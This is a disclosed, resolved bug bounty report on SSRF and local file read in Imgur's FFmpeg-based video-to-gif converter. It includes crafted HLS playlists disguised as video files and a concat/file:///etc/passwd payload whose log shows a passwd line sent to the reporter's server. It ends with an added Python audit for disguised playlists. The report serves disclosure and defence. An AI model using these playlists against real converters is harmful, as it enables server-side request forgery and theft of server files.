SSRF and local file read in video to gif converter
Unknown
Vulnerability Details
The video to gif converter at http://imgur.com/vidgif uses Lavf/55.48.100 (FFmpeg's libavformat) with network protocols enabled. This makes SSRF possible by uploading a specially crafted playlist: libavformat probes the content rather than trusting the file extension, so an HLS playlist served under an mp4 name is demuxed as a playlist and its entries are fetched by the server. For example, http://yngwie.ru/1.mp4 contains:
```
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://yngwie.ru/2.mp4
#EXT-X-ENDLIST
```
Upload it with the following request:
```
POST /vidgif/upload HTTP/1.1
Host: imgur.com
...
source=http://yngwie.ru/1.mp4&url=http://yngwie.ru/1.mp4&start=0.08&stop=5.12
```
and watch the attacker's web server access log: the second request, for 2.mp4, comes from a different Imgur host with the Lavf user agent:
```
54.167.254.53 - - [11/Feb/2016:05:08:20 -0500] "GET /1.mp4 HTTP/1.1" 200 84 "http://yngwie.ru" "-" "-"
54.82.61.224 - - [11/Feb/2016:05:08:20 -0500] "GET /2.mp4 HTTP/1.1" 404 169 "-" "Lavf/55.48.100" "-"
```
But this vulnerability is not only about HTTP requests: it allows arbitrary files to be read from the server. Here is a quick PoC that reads the first line of /etc/passwd, served as http://yngwie.ru/test.avi:
```
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://yngwie.ru/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
```
header.m3u8 (important: no newline or whitespace after the last line, so that the leaked data is appended to the URL rather than landing on a line of its own):
```
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://yngwie.ru?
```
The concat protocol (https://www.ffmpeg.org/ffmpeg-protocols.html#concat) joins the two inputs into one byte stream, which produces a valid playlist whose last entry is the URL with the first line of /etc/passwd appended; the server then requests it:
```
54.82.61.224 - - [11/Feb/2016:04:55:32 -0500] "GET ?root:x:0:0:root:/root:/bin/bash HTTP/1.1" 400 173 "-" "-" "-"
```
Full files can be read with the subfile protocol (https://www.ffmpeg.org/ffmpeg-protocols.html#subfile), or by constructing 100% valid video files and extracting the data from the resulting gifs.
Sensitive files on the server, private APIs accessible from the server, or other allowed protocols which I didn't check may even lead to RCE.
Links to the original report on this issue:
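The following is an added example and is not part of the report or of Imgur's converter. It shows the two checks a converter owner would want on the upload side: a pre-flight audit that detects an M3U playlist disguised as a video and rejects any entry whose protocols are not plain http(s), and an emulation of the concat join that makes the "no trailing newline" caveat concrete. The playlist texts are constructed copies of the ones above; the passwd content, the function names and the `ALLOWED_SCHEMES` policy are assumptions of this example.

```python
"""
Added example, not from the original report: a pre-flight audit for files
handed to an FFmpeg/Lavf-based converter, plus an emulation of the
concat:<playlist>|file:<path> trick used to leak a line of /etc/passwd.
"""
import re
from typing import List, Set

# Policy assumed for this example: a video converter only ever needs to
# fetch over http(s). file:, concat:, subfile:, data:, gopher: ... are out.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed copies of the two playlists the report uploads as 1.mp4 and test.avi.
PLAYLIST_SSRF = (
    "#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\n"
    "http://yngwie.ru/2.mp4\n#EXT-X-ENDLIST\n"
)
PLAYLIST_FILE_READ = (
    "#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\n"
    "concat:http://yngwie.ru/header.m3u8|file:///etc/passwd\n#EXT-X-ENDLIST\n"
)
# Constructed header.m3u8: deliberately NO newline after the final URL.
HEADER_M3U8 = "#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:,\nhttp://yngwie.ru?"
# Constructed stand-in for /etc/passwd.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)

# A "<scheme>:" token at the start of the string or right after one of the
# separators FFmpeg's wrapper protocols use (| , : =) or whitespace.
_SCHEME_RE = re.compile(r"(?<![^|,:=\s])([A-Za-z][A-Za-z0-9+.\-]*):")


def is_m3u_playlist(data: bytes) -> bool:
    """True if the upload starts with the M3U magic, whatever its extension."""
    return data.lstrip(b"\xef\xbb\xbf").lstrip().startswith(b"#EXTM3U")


def playlist_uris(text: str) -> List[str]:
    """Non-tag, non-empty lines of an M3U8 file: these are the media URIs."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def schemes_in(uri: str) -> Set[str]:
    """Every protocol scheme in a URI, including ones nested by concat:/subfile."""
    return {m.lower() for m in _SCHEME_RE.findall(uri)}


def audit_upload(data: bytes) -> List[str]:
    """Return findings for an upload; an empty list means nothing suspicious."""
    findings = []
    if not is_m3u_playlist(data):
        return findings  # a real container: no URIs for the demuxer to follow
    findings.append("upload is an M3U playlist, not a media container")
    for uri in playlist_uris(data.decode("utf-8", "replace")):
        bad = schemes_in(uri) - ALLOWED_SCHEMES
        if bad or not uri.lower().startswith(("http://", "https://")):
            findings.append("disallowed protocol(s) %s in entry %r"
                            % (sorted(bad) or ["<non-http>"], uri))
        else:
            findings.append("remote fetch by the converter: " + uri)
    return findings


def concat_playlist_uris(header: str, appended_file: str) -> List[str]:
    """Emulate concat:<header>|file:<path>: the demuxer sees one byte stream."""
    return playlist_uris(header + appended_file)


if __name__ == "__main__":
    for name, text in (("1.mp4", PLAYLIST_SSRF), ("test.avi", PLAYLIST_FILE_READ)):
        print(name, audit_upload(text.encode()))
    print(concat_playlist_uris(HEADER_M3U8, FAKE_PASSWD)[0])
```

The audit is a defence in depth only: it inspects the first file, and a playlist that the converter is allowed to fetch can itself reference further playlists. The fix that actually closes the hole is to run the converter with FFmpeg's `-protocol_whitelist` restricted to the protocols it genuinely needs (for example `file,crypto` when inputs are always local copies), so that `concat`, `subfile` and `file` are never reachable from untrusted input in the first place.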
https://habrahabr.ru/company/mailru/blog/274855/ (russian)
http://www.openwall.com/lists/oss-security/2016/01/14/1
Report Stats
- Report ID: 115857
- State: Closed
- Substate: resolved
- Upvotes: 12